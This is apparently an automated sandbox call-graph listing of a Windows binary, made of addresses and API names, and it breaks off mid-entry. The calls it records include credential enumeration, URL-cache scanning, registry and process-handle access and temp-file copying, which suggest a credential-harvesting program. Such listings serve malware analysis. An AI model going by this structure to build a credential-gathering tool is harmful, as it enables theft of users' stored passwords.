44db70 38119->38120 38121 40da8d memset 38120->38121 38122 40daac LoadStringW 38121->38122 38123 40dac6 38122->38123 38123->38122 38125 40dade 38123->38125 38135 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38123->38135 38125->37897 38126->38097 38127->38098 38128->38100 38129->38102 38130->38104 38131->38106 38132->38108 38133->38110 38134->38112 38135->38123 38146 409b98 GetFileAttributesW 38136->38146 38138 40daea 38139 40db63 38138->38139 38140 40daef wcscpy wcscpy GetPrivateProfileIntW 38138->38140 38139->37899 38147 40d65d GetPrivateProfileStringW 38140->38147 38142 40db3e 38148 40d65d GetPrivateProfileStringW 38142->38148 38144 40db4f 38149 40d65d GetPrivateProfileStringW 38144->38149 38146->38138 38147->38142 38148->38144 38149->38139 38185 40eaff 38150->38185 38154 411ae2 memset 38153->38154 38155 411b8f 38153->38155 38225 409bca GetModuleFileNameW 38154->38225 38167 411a8b 38155->38167 38157 411b0a wcsrchr 38158 411b22 wcscat 38157->38158 38159 411b1f 38157->38159 38226 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38158->38226 38159->38158 38161 411b67 38227 402afb 38161->38227 38165 411b7f 38283 40ea13 SendMessageW memset SendMessageW 38165->38283 38168 402afb 27 API calls 38167->38168 38169 411ac0 38168->38169 38170 4110dc 38169->38170 38171 41113e 38170->38171 38176 4110f0 38170->38176 38308 40969c LoadCursorW SetCursor 38171->38308 38173 411143 38309 4032b4 38173->38309 38327 444a54 38173->38327 38174 4110f7 _wcsicmp 38174->38176 38175 411157 38177 40ada2 _wcsicmp 38175->38177 38176->38171 38176->38174 38330 410c46 10 API calls 38176->38330 38180 411167 38177->38180 38178 4111af 38180->38178 38181 4111a6 qsort 38180->38181 38181->38178 38184->37981 38186 40eb10 38185->38186 38198 40e8e0 38186->38198 38189 40eb6c memcpy memcpy 38190 40ebb7 38189->38190 38190->38189 38191 40ebf2 ??2@YAPAXI ??2@YAPAXI 38190->38191 38192 40d134 16 API calls 38190->38192 38193 40ec2e ??2@YAPAXI 38191->38193 38195 40ec65 38191->38195 38192->38190 38193->38195 38195->38195 38208 40ea7f 38195->38208 38197 402f49 38197->37981 38199 40e8f2 38198->38199 38200 40e8eb ??3@YAXPAX 38198->38200 38201 40e900 38199->38201 38202 40e8f9 ??3@YAXPAX 38199->38202 38200->38199 38203 40e911 38201->38203 38204 40e90a ??3@YAXPAX 38201->38204 38202->38201 38205 40e931 ??2@YAPAXI ??2@YAPAXI 38203->38205 38206 40e921 ??3@YAXPAX 38203->38206 38207 40e92a ??3@YAXPAX 38203->38207 38204->38203 38205->38189 38206->38207 38207->38205 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea88 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40ea90 38211->38212 38213 40aa04 ??3@YAXPAX 38212->38213 38214 40ea98 38213->38214 38215 40aa04 ??3@YAXPAX 38214->38215 38216 40eaa0 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eab3 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40eabd 38219->38220 38221 40a9ce 4 API calls 38220->38221 38222 40eac7 38221->38222 38223 40a9ce 4 API calls 38222->38223 38224 40ead1 38223->38224 38224->38197 38225->38157 38226->38161 38284 40b2cc 38227->38284 38229 402b0a 38230 40b2cc 27 API calls 38229->38230 38231 402b23 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b3a 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b54 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b6b 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402b82 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402b99 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bb0 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bc7 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402bde 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402bf5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c0c 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c23 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c3a 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c51 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c68 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402c7f 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402c99 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cb3 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402cd5 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402cf0 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d0b 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d26 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d3e 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d59 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402d78 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402d93 38280->38281 38282 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38281->38282 38282->38165 38283->38155 38287 40b58d 38284->38287 38286 40b2d1 38286->38229 38288 40b5a4 GetModuleHandleW FindResourceW 38287->38288 38289 40b62e 38287->38289 38290 40b5c2 LoadResource 38288->38290 38291 40b5e7 38288->38291 38289->38286 38290->38291 38292 40b5d0 SizeofResource LockResource 38290->38292 38291->38289 38300 40afcf 38291->38300 38292->38291 38294 40b608 memcpy 38303 40b4d3 memcpy 38294->38303 38296 40b61e 38304 40b3c1 18 API calls 38296->38304 38298 40b626 38305 40b04b 38298->38305 38301 40b04b ??3@YAXPAX 38300->38301 38302 40afd7 ??2@YAPAXI 38301->38302 38302->38294 38303->38296 38304->38298 38306 40b051 ??3@YAXPAX 38305->38306 38307 40b05f 38305->38307 38306->38307 38307->38289 38308->38173 38310 4032c4 38309->38310 38311 40b633 ??3@YAXPAX 38310->38311 38312 403316 38311->38312 38331 44553b 38312->38331 38316 403480 38527 40368c 15 API calls 38316->38527 38318 403489 38319 40b633 ??3@YAXPAX 38318->38319 38320 403495 38319->38320 38320->38175 38321 4033a9 memset memcpy 38322 4033ec wcscmp 38321->38322 38323 40333c 38321->38323 38322->38323 38323->38316 38323->38321 38323->38322 38525 4028e7 11 API calls 38323->38525 38526 40f508 6 API calls 38323->38526 38325 403421 _wcsicmp 38325->38323 38328 444a64 FreeLibrary 38327->38328 38329 444a83 38327->38329 38328->38329 38329->38175 38330->38176 38332 445548 38331->38332 38333 445599 38332->38333 38528 40c768 38332->38528 38334 4455a8 memset 38333->38334 38340 4457f2 38333->38340 38611 403988 38334->38611 38343 445854 38340->38343 38713 403e2d memset memset memset memset memset 38340->38713 38394 4458aa 38343->38394 38736 403c9c memset memset memset memset memset 38343->38736 38344 445672 38622 403fbe memset memset memset memset memset 38344->38622 38345 4458bb memset memset 38347 414c2e 16 API calls 38345->38347 38346 4455e5 38346->38344 38356 44560f 38346->38356 38350 4458f9 38347->38350 38349 44595e memset memset 38354 414c2e 16 API calls 38349->38354 38355 40b2cc 27 API calls 38350->38355 38352 445a00 memset memset 38759 414c2e 38352->38759 38353 445b22 38359 445bca 38353->38359 38360 445b38 memset memset memset 38353->38360 38364 44599c 38354->38364 38365 445909 38355->38365 38367 4087b3 338 API calls 38356->38367 38357 44557a 38391 44558c 38357->38391 38808 41366b FreeLibrary 38357->38808 38358 445849 38823 40b1ab ??3@YAXPAX ??3@YAXPAX 38358->38823 38366 445c8b memset memset 38359->38366 38433 445cf0 38359->38433 38369 445bd4 38360->38369 38370 445b98 38360->38370 38373 40b2cc 27 API calls 38364->38373 38375 409d1f 6 API calls 38365->38375 38378 414c2e 16 API calls 38366->38378 38376 445621 38367->38376 38368 44589f 38824 40b1ab ??3@YAXPAX ??3@YAXPAX 38368->38824 38384 414c2e 16 API calls 38369->38384 38370->38369 38380 445ba2 38370->38380 38377 4459ac 38373->38377 38374 403335 38524 4452e5 45 API calls 38374->38524 38387 445919 38375->38387 38809 4454bf 20 API calls 38376->38809 38389 409d1f 6 API calls 38377->38389 38390 445cc9 38378->38390 38896 4099c6 wcslen 38380->38896 38381 4456b2 38811 40b1ab ??3@YAXPAX ??3@YAXPAX 38381->38811 38383 40b2cc 27 API calls 38395 445a4f 38383->38395 38397 445be2 38384->38397 38385 445d3d 38418 40b2cc 27 API calls 38385->38418 38386 445d88 memset memset memset 38401 414c2e 16 API calls 38386->38401 38825 409b98 GetFileAttributesW 38387->38825 38388 445823 38388->38358 38400 4087b3 338 API calls 38388->38400 38402 4459bc 38389->38402 38403 409d1f 6 API calls 38390->38403 38595 444b06 38391->38595 38392 445879 38392->38368 38413 4087b3 338 API calls 38392->38413 38394->38345 38419 44594a 38394->38419 38774 409d1f wcslen wcslen 38395->38774 38398 40b2cc 27 API calls 38397->38398 38407 445bf3 38398->38407 38400->38388 38410 445dde 38401->38410 38892 409b98 GetFileAttributesW 38402->38892 38412 445ce1 38403->38412 38404 445bb3 38899 445403 memset 38404->38899 38405 445680 38405->38381 38645 4087b3 memset 38405->38645 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38826 40b6ef 38408->38826 38420 40b2cc 27 API calls 38410->38420 38916 409b98 GetFileAttributesW 38412->38916 38413->38392 38416 40b2cc 27 API calls 38425 445a94 38416->38425 38427 445c07 38417->38427 38428 445d54 _wcsicmp 38418->38428 38419->38349 38432 4459ed 38419->38432 38431 445def 38420->38431 38421 4459cb 38421->38432 38441 40b6ef 252 API calls 38421->38441 38779 40ae18 38425->38779 38426 44566d 38426->38340 38696 413d4c 38426->38696 38437 445389 258 API calls 38427->38437 38438 445d71 38428->38438 38503 445d67 38428->38503 38430 445665 38810 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38810 38439 409d1f 6 API calls 38431->38439 38432->38352 38432->38353 38433->38374 38433->38385 38433->38386 38434 445389 258 API calls 38434->38359 38443 445c17 38437->38443 38917 445093 23 API calls 38438->38917 38446 445e03 38439->38446 38441->38432 38442 4456d8 38448 40b2cc 27 API calls 38442->38448 38449 40b2cc 27 API calls 38443->38449 38445 44563c 38445->38430 38451 4087b3 338 API calls 38445->38451 38918 409b98 GetFileAttributesW 38446->38918 38447 40b6ef 252 API calls 38447->38374 38453 4456e2 38448->38453 38454 445c23 38449->38454 38450 445d83 38450->38374 38451->38445 38812 413fa6 _wcsicmp _wcsicmp 38453->38812 38458 409d1f 6 API calls 38454->38458 38456 445e12 38463 445e6b 38456->38463 38469 40b2cc 27 API calls 38456->38469 38461 445c37 38458->38461 38459 445aa1 38462 445b17 38459->38462 38477 445ab2 memset 38459->38477 38490 409d1f 6 API calls 38459->38490 38786 40add4 38459->38786 38791 445389 38459->38791 38800 40ae51 38459->38800 38460 4456eb 38465 4456fd memset memset memset memset 38460->38465 38466 4457ea 38460->38466 38467 445389 258 API calls 38461->38467 38893 40aebe 38462->38893 38920 445093 23 API calls 38463->38920 38813 409c70 wcscpy wcsrchr 38465->38813 38816 413d29 38466->38816 38473 445c47 38467->38473 38474 445e33 38469->38474 38471 445e7e 38476 445f67 38471->38476 38479 40b2cc 27 API calls 38473->38479 38480 409d1f 6 API calls 38474->38480 38485 40b2cc 27 API calls 38476->38485 38481 40b2cc 27 API calls 38477->38481 38483 445c53 38479->38483 38484 445e47 38480->38484 38481->38459 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38919 409b98 GetFileAttributesW 38484->38919 38489 445f73 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38494 409d1f 6 API calls 38489->38494 38490->38459 38495 44578d 38491->38495 38496 445389 258 API calls 38492->38496 38493 445e56 38493->38463 38499 445e83 memset 38493->38499 38497 445f87 38494->38497 38495->38466 38502 40b2cc 27 API calls 38495->38502 38496->38359 38923 409b98 GetFileAttributesW 38497->38923 38501 40b2cc 27 API calls 38499->38501 38504 445eab 38501->38504 38505 4457a8 38502->38505 38503->38374 38503->38447 38506 409d1f 6 API calls 38504->38506 38507 409d1f 6 API calls 38505->38507 38508 445ebf 38506->38508 38509 4457b8 38507->38509 38510 40ae18 9 API calls 38508->38510 38815 409b98 GetFileAttributesW 38509->38815 38520 445ef5 38510->38520 38512 4457c7 38512->38466 38514 4087b3 338 API calls 38512->38514 38513 40ae51 9 API calls 38513->38520 38514->38466 38515 445f5c 38517 40aebe FindClose 38515->38517 38516 40add4 2 API calls 38516->38520 38517->38476 38518 40b2cc 27 API calls 38518->38520 38519 409d1f 6 API calls 38519->38520 38520->38513 38520->38515 38520->38516 38520->38518 38520->38519 38522 445f3a 38520->38522 38921 409b98 GetFileAttributesW 38520->38921 38922 445093 23 API calls 38522->38922 38524->38323 38525->38325 38526->38323 38527->38318 38529 40c775 38528->38529 38924 40b1ab ??3@YAXPAX ??3@YAXPAX 38529->38924 38531 40c788 38925 40b1ab ??3@YAXPAX ??3@YAXPAX 38531->38925 38533 40c790 38926 40b1ab ??3@YAXPAX ??3@YAXPAX 38533->38926 38535 40c798 38536 40aa04 ??3@YAXPAX 38535->38536 38537 40c7a0 38536->38537 38927 40c274 memset 38537->38927 38542 40a8ab 9 API calls 38543 40c7c3 38542->38543 38544 40a8ab 9 API calls 38543->38544 38545 40c7d0 38544->38545 38956 40c3c3 38545->38956 38549 40c7e5 38550 40c877 38549->38550 38551 40c86c 38549->38551 38557 40c634 49 API calls 38549->38557 38981 40a706 38549->38981 38558 40bdb0 38550->38558 38998 4053fe 39 API calls 38551->38998 38557->38549 39188 404363 38558->39188 38561 40bf5d 39208 40440c 38561->39208 38563 40bdee 38563->38561 38566 40b2cc 27 API calls 38563->38566 38564 40bddf CredEnumerateW 38564->38563 38567 40be02 wcslen 38566->38567 38567->38561 38569 40be1e 38567->38569 38568 40be26 _wcsncoll 38568->38569 38569->38561 38569->38568 38572 40be7d memset 38569->38572 38573 40bea7 memcpy 38569->38573 38574 40bf11 wcschr 38569->38574 38575 40b2cc 27 API calls 38569->38575 38577 40bf43 LocalFree 38569->38577 39211 40bd5d 28 API calls 38569->39211 39212 404423 38569->39212 38572->38569 38572->38573 38573->38569 38573->38574 38574->38569 38576 40bef6 _wcsnicmp 38575->38576 38576->38569 38576->38574 38577->38569 38578 4135f7 39225 4135e0 38578->39225 38581 40b2cc 27 API calls 38582 41360d 38581->38582 38583 40a804 8 API calls 38582->38583 38584 413613 38583->38584 38585 41361b 38584->38585 38586 41363e 38584->38586 38587 40b273 27 API calls 38585->38587 38588 4135e0 FreeLibrary 38586->38588 38589 413625 GetProcAddress 38587->38589 38590 413643 38588->38590 38589->38586 38591 413648 38589->38591 38590->38357 38592 413658 38591->38592 38593 4135e0 FreeLibrary 38591->38593 38592->38357 38594 413666 38593->38594 38594->38357 39228 4449b9 38595->39228 38598 444c1f 38598->38333 38599 4449b9 42 API calls 38601 444b4b 38599->38601 38600 444c15 38603 4449b9 42 API calls 38600->38603 38601->38600 39249 444972 GetVersionExW 38601->39249 38603->38598 38604 444b99 memcmp 38609 444b8c 38604->38609 38605 444c0b 39253 444a85 42 API calls 38605->39253 38609->38604 38609->38605 39250 444aa5 42 API calls 38609->39250 39251 40a7a0 GetVersionExW 38609->39251 39252 444a85 42 API calls 38609->39252 38612 40399d 38611->38612 39254 403a16 38612->39254 38614 403a09 39268 40b1ab ??3@YAXPAX ??3@YAXPAX 38614->39268 38616 403a12 wcsrchr 38616->38346 38617 4039a3 38617->38614 38620 4039f4 38617->38620 39265 40a02c CreateFileW 38617->39265 38620->38614 38621 4099c6 2 API calls 38620->38621 38621->38614 38623 414c2e 16 API calls 38622->38623 38624 404048 38623->38624 38625 414c2e 16 API calls 38624->38625 38626 404056 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 404073 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 40408e 38629->38630 38631 409d1f 6 API calls 38630->38631 38632 4040a6 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040ba 38633->38634 38635 403af5 20 API calls 38634->38635 38636 4040cb 38635->38636 39295 40414f memset 38636->39295 38638 404140 39309 40b1ab ??3@YAXPAX ??3@YAXPAX 38638->39309 38640 4040ec memset 38643 4040e0 38640->38643 38641 404148 38641->38405 38642 4099c6 2 API calls 38642->38643 38643->38638 38643->38640 38643->38642 38644 40a8ab 9 API calls 38643->38644 38644->38643 39322 40a6e6 WideCharToMultiByte 38645->39322 38647 4087ed 39323 4095d9 memset 38647->39323 38650 408953 38650->38405 38651 408809 memset memset memset memset memset 38652 40b2cc 27 API calls 38651->38652 38653 4088a1 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088b1 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088c0 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 4088d0 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 4088df 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 4088ef 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 4088fe 38664->38665 38666 409d1f 6 API calls 38665->38666 38667 40890e 38666->38667 38668 40b2cc 27 API calls 38667->38668 38669 40891d 38668->38669 38670 409d1f 6 API calls 38669->38670 38671 40892d 38670->38671 38697 40b633 ??3@YAXPAX 38696->38697 38698 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38697->38698 38699 413f00 Process32NextW 38698->38699 38700 413da5 OpenProcess 38699->38700 38701 413f17 FindCloseChangeNotification 38699->38701 38702 413df3 memset 38700->38702 38706 413eb0 38700->38706 38701->38442 39634 413f27 38702->39634 38704 413ebf ??3@YAXPAX 38704->38706 38705 4099f4 3 API calls 38705->38706 38706->38699 38706->38704 38706->38705 38708 413e37 GetModuleHandleW 38709 413e46 GetProcAddress 38708->38709 38710 413e1f 38708->38710 38709->38710 38710->38708 39639 413959 38710->39639 39655 413ca4 38710->39655 38712 413ea2 CloseHandle 38712->38706 38714 414c2e 16 API calls 38713->38714 38715 403eb7 38714->38715 38716 414c2e 16 API calls 38715->38716 38717 403ec5 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403ee2 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403efd 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 403f15 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f29 38724->38725 38726 403af5 20 API calls 38725->38726 38727 403f3a 38726->38727 38728 40414f 33 API calls 38727->38728 38733 403f4f 38728->38733 38729 403faf 39669 40b1ab ??3@YAXPAX ??3@YAXPAX 38729->39669 38731 403f5b memset 38731->38733 38732 403fb7 38732->38388 38733->38729 38733->38731 38734 4099c6 2 API calls 38733->38734 38735 40a8ab 9 API calls 38733->38735 38734->38733 38735->38733 38737 414c2e 16 API calls 38736->38737 38738 403d26 38737->38738 38739 414c2e 16 API calls 38738->38739 38740 403d34 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d51 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d6c 38743->38744 38745 409d1f 6 API calls 38744->38745 38746 403d84 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403d98 38747->38748 38749 403af5 20 API calls 38748->38749 38750 403da9 38749->38750 38751 40414f 33 API calls 38750->38751 38752 403dbe 38751->38752 38753 403e1e 38752->38753 38754 403dca memset 38752->38754 38757 4099c6 2 API calls 38752->38757 38758 40a8ab 9 API calls 38752->38758 39670 40b1ab ??3@YAXPAX ??3@YAXPAX 38753->39670 38754->38752 38756 403e26 38756->38392 38757->38752 38758->38752 38760 414b81 9 API calls 38759->38760 38761 414c40 38760->38761 38762 414c73 memset 38761->38762 39671 409cea 38761->39671 38764 414c94 38762->38764 39674 414592 RegOpenKeyExW 38764->39674 38766 414c64 38766->38383 38768 414cc1 38769 414cf4 wcscpy 38768->38769 39675 414bb0 wcscpy 38768->39675 38769->38766 38771 414cd2 39676 4145ac RegQueryValueExW 38771->39676 38773 414ce9 RegCloseKey 38773->38769 38775 409d62 38774->38775 38776 409d43 wcscpy 38774->38776 38775->38416 38777 409719 2 API calls 38776->38777 38778 409d51 wcscat 38777->38778 38778->38775 38780 40aebe FindClose 38779->38780 38781 40ae21 38780->38781 38782 4099c6 2 API calls 38781->38782 38783 40ae35 38782->38783 38784 409d1f 6 API calls 38783->38784 38785 40ae49 38784->38785 38785->38459 38787 40ade0 38786->38787 38788 40ae0f 38786->38788 38787->38788 38789 40ade7 wcscmp 38787->38789 38788->38459 38789->38788 38790 40adfe wcscmp 38789->38790 38790->38788 38792 40ae18 9 API calls 38791->38792 38798 4453c4 38792->38798 38793 40ae51 9 API calls 38793->38798 38794 4453f3 38796 40aebe FindClose 38794->38796 38795 40add4 2 API calls 38795->38798 38797 4453fe 38796->38797 38797->38459 38798->38793 38798->38794 38798->38795 38799 445403 253 API calls 38798->38799 38799->38798 38801 40ae7b FindNextFileW 38800->38801 38802 40ae5c FindFirstFileW 38800->38802 38803 40ae94 38801->38803 38804 40ae8f 38801->38804 38802->38803 38806 409d1f 6 API calls 38803->38806 38807 40aeb6 38803->38807 38805 40aebe FindClose 38804->38805 38805->38803 38806->38807 38807->38459 38808->38391 38809->38445 38810->38426 38811->38426 38812->38460 38814 409c89 38813->38814 38814->38482 38815->38512 38817 413d39 38816->38817 38818 413d2f FreeLibrary 38816->38818 38819 40b633 ??3@YAXPAX 38817->38819 38818->38817 38820 413d42 38819->38820 38821 40b633 ??3@YAXPAX 38820->38821 38822 413d4a 38821->38822 38822->38340 38823->38343 38824->38394 38825->38408 38827 44db70 38826->38827 38828 40b6fc memset 38827->38828 38829 409c70 2 API calls 38828->38829 38830 40b732 wcsrchr 38829->38830 38831 40b743 38830->38831 38832 40b746 memset 38830->38832 38831->38832 38833 40b2cc 27 API calls 38832->38833 38834 40b76f 38833->38834 38835 409d1f 6 API calls 38834->38835 38836 40b783 38835->38836 39677 409b98 GetFileAttributesW 38836->39677 38838 40b792 38839 40b7c2 38838->38839 38840 409c70 2 API calls 38838->38840 39678 40bb98 38839->39678 38842 40b7a5 38840->38842 38844 40b2cc 27 API calls 38842->38844 38848 40b7b2 38844->38848 38845 40b837 FindCloseChangeNotification 38847 40b83e memset 38845->38847 38846 40b817 39712 409a45 GetTempPathW 38846->39712 39711 40a6e6 WideCharToMultiByte 38847->39711 38851 409d1f 6 API calls 38848->38851 38851->38839 38852 40b827 CopyFileW 38852->38847 38853 40b866 38854 444432 121 API calls 38853->38854 38855 40b879 38854->38855 38856 40bad5 38855->38856 38857 40b273 27 API calls 38855->38857 38858 40baeb 38856->38858 38859 40bade DeleteFileW 38856->38859 38860 40b89a 38857->38860 38861 40b04b ??3@YAXPAX 38858->38861 38859->38858 38862 438552 134 API calls 38860->38862 38863 40baf3 38861->38863 38864 40b8a4 38862->38864 38863->38419 38865 40bacd 38864->38865 38867 4251c4 137 API calls 38864->38867 38866 443d90 111 API calls 38865->38866 38866->38856 38890 40b8b8 38867->38890 38868 40bac6 39724 424f26 123 API calls 38868->39724 38869 40b8bd memset 39715 425413 17 API calls 38869->39715 38872 425413 17 API calls 38872->38890 38875 40a71b MultiByteToWideChar 38875->38890 38876 40a734 MultiByteToWideChar 38876->38890 38879 40b9b5 memcmp 38879->38890 38880 4099c6 2 API calls 38880->38890 38881 404423 37 API calls 38881->38890 38884 40bb3e memset memcpy 39725 40a734 MultiByteToWideChar 38884->39725 38885 4251c4 137 API calls 38885->38890 38887 40bb88 LocalFree 38887->38890 38890->38868 38890->38869 38890->38872 38890->38875 38890->38876 38890->38879 38890->38880 38890->38881 38890->38884 38890->38885 38891 40ba5f memcmp 38890->38891 39716 4253ef 16 API calls 38890->39716 39717 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38890->39717 39718 4253af 17 API calls 38890->39718 39719 4253cf 17 API calls 38890->39719 39720 447280 memset 38890->39720 39721 447960 memset memcpy memcpy memcpy 38890->39721 39722 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38890->39722 39723 447920 memcpy memcpy memcpy 38890->39723 38891->38890 38892->38421 38894 40aed1 38893->38894 38895 40aec7 FindClose 38893->38895 38894->38353 38895->38894 38897 4099d7 38896->38897 38898 4099da memcpy 38896->38898 38897->38898 38898->38404 38900 40b2cc 27 API calls 38899->38900 38901 44543f 38900->38901 38902 409d1f 6 API calls 38901->38902 38903 44544f 38902->38903 39817 409b98 GetFileAttributesW 38903->39817 38905 44545e 38906 445476 38905->38906 38907 40b6ef 252 API calls 38905->38907 38908 40b2cc 27 API calls 38906->38908 38907->38906 38909 445482 38908->38909 38910 409d1f 6 API calls 38909->38910 38911 445492 38910->38911 39818 409b98 GetFileAttributesW 38911->39818 38913 4454a1 38914 4454b9 38913->38914 38915 40b6ef 252 API calls 38913->38915 38914->38434 38915->38914 38916->38433 38917->38450 38918->38456 38919->38493 38920->38471 38921->38520 38922->38520 38923->38503 38924->38531 38925->38533 38926->38535 38928 414c2e 16 API calls 38927->38928 38929 40c2ae 38928->38929 38999 40c1d3 38929->38999 38934 40c3be 38951 40a8ab 38934->38951 38935 40afcf 2 API calls 38936 40c2fd FindFirstUrlCacheEntryW 38935->38936 38937 40c3b6 38936->38937 38938 40c31e wcschr 38936->38938 38939 40b04b ??3@YAXPAX 38937->38939 38940 40c331 38938->38940 38941 40c35e FindNextUrlCacheEntryW 38938->38941 38939->38934 38942 40a8ab 9 API calls 38940->38942 38941->38938 38943 40c373 GetLastError 38941->38943 38946 40c33e wcschr 38942->38946 38944 40c3ad FindCloseUrlCache 38943->38944 38945 40c37e 38943->38945 38944->38937 38947 40afcf 2 API calls 38945->38947 38946->38941 38948 40c34f 38946->38948 38949 40c391 FindNextUrlCacheEntryW 38947->38949 38950 40a8ab 9 API calls 38948->38950 38949->38938 38949->38944 38950->38941 39115 40a97a 38951->39115 38954 40a8cc 38954->38542 38955 40a8d0 7 API calls 38955->38954 39120 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39120 38958 40c3dd 38959 40b2cc 27 API calls 38958->38959 38960 40c3e7 38959->38960 39121 414592 RegOpenKeyExW 38960->39121 38962 40c3f4 38963 40c50e 38962->38963 38964 40c3ff 38962->38964 38978 405337 38963->38978 38965 40a9ce 4 API calls 38964->38965 38966 40c418 memset 38965->38966 39122 40aa1d 38966->39122 38969 40c471 38971 40c47a _wcsupr 38969->38971 38970 40c505 RegCloseKey 38970->38963 38972 40a8d0 7 API calls 38971->38972 38973 40c498 38972->38973 38974 40a8d0 7 API calls 38973->38974 38975 40c4ac memset 38974->38975 38976 40aa1d 38975->38976 38977 40c4e4 RegEnumValueW 38976->38977 38977->38970 38977->38971 39124 405220 38978->39124 38982 4099c6 2 API calls 38981->38982 38983 40a714 _wcslwr 38982->38983 38984 40c634 38983->38984 39181 405361 38984->39181 38987 40c65c wcslen 39184 4053b6 39 API calls 38987->39184 38988 40c71d wcslen 38988->38549 38990 40c677 38991 40c713 38990->38991 39185 40538b 39 API calls 38990->39185 39187 4053df 39 API calls 38991->39187 38994 40c6a5 38994->38991 38995 40c6a9 memset 38994->38995 38996 40c6d3 38995->38996 39186 40c589 43 API calls 38996->39186 38998->38550 39000 40ae18 9 API calls 38999->39000 39006 40c210 39000->39006 39001 40ae51 9 API calls 39001->39006 39002 40c264 39003 40aebe FindClose 39002->39003 39005 40c26f 39003->39005 39004 40add4 2 API calls 39004->39006 39011 40e5ed memset memset 39005->39011 39006->39001 39006->39002 39006->39004 39007 40c231 _wcsicmp 39006->39007 39008 40c1d3 35 API calls 39006->39008 39007->39006 39009 40c248 39007->39009 39008->39006 39024 40c084 22 API calls 39009->39024 39012 414c2e 16 API calls 39011->39012 39013 40e63f 39012->39013 39014 409d1f 6 API calls 39013->39014 39015 40e658 39014->39015 39025 409b98 GetFileAttributesW 39015->39025 39017 40e667 39018 40e680 39017->39018 39019 409d1f 6 API calls 39017->39019 39026 409b98 GetFileAttributesW 39018->39026 39019->39018 39021 40e68f 39022 40c2d8 39021->39022 39027 40e4b2 39021->39027 39022->38934 39022->38935 39024->39006 39025->39017 39026->39021 39048 40e01e 39027->39048 39029 40e593 39031 40e5b0 39029->39031 39032 40e59c DeleteFileW 39029->39032 39030 40e521 39030->39029 39071 40e175 39030->39071 39033 40b04b ??3@YAXPAX 39031->39033 39032->39031 39034 40e5bb 39033->39034 39036 40e5c4 CloseHandle 39034->39036 39037 40e5cc 39034->39037 39036->39037 39039 40b633 ??3@YAXPAX 39037->39039 39038 40e573 39040 40e584 39038->39040 39041 40e57c FindCloseChangeNotification 39038->39041 39042 40e5db 39039->39042 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 39040->39114 39041->39040 39045 40b633 ??3@YAXPAX 39042->39045 39044 40e540 39044->39038 39091 40e2ab 39044->39091 39046 40e5e3 39045->39046 39046->39022 39049 406214 22 API calls 39048->39049 39050 40e03c 39049->39050 39051 40e16b 39050->39051 39052 40dd85 74 API calls 39050->39052 39051->39030 39053 40e06b 39052->39053 39053->39051 39054 40afcf ??2@YAPAXI ??3@YAXPAX 39053->39054 39055 40e08d OpenProcess 39054->39055 39056 40e0a4 GetCurrentProcess DuplicateHandle 39055->39056 39060 40e152 39055->39060 39057 40e0d0 GetFileSize 39056->39057 39058 40e14a CloseHandle 39056->39058 39061 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39057->39061 39058->39060 39059 40e160 39063 40b04b ??3@YAXPAX 39059->39063 39060->39059 39062 406214 22 API calls 39060->39062 39064 40e0ea 39061->39064 39062->39059 39063->39051 39065 4096dc CreateFileW 39064->39065 39066 40e0f1 CreateFileMappingW 39065->39066 39067 40e140 CloseHandle CloseHandle 39066->39067 39068 40e10b MapViewOfFile 39066->39068 39067->39058 39069 40e13b FindCloseChangeNotification 39068->39069 39070 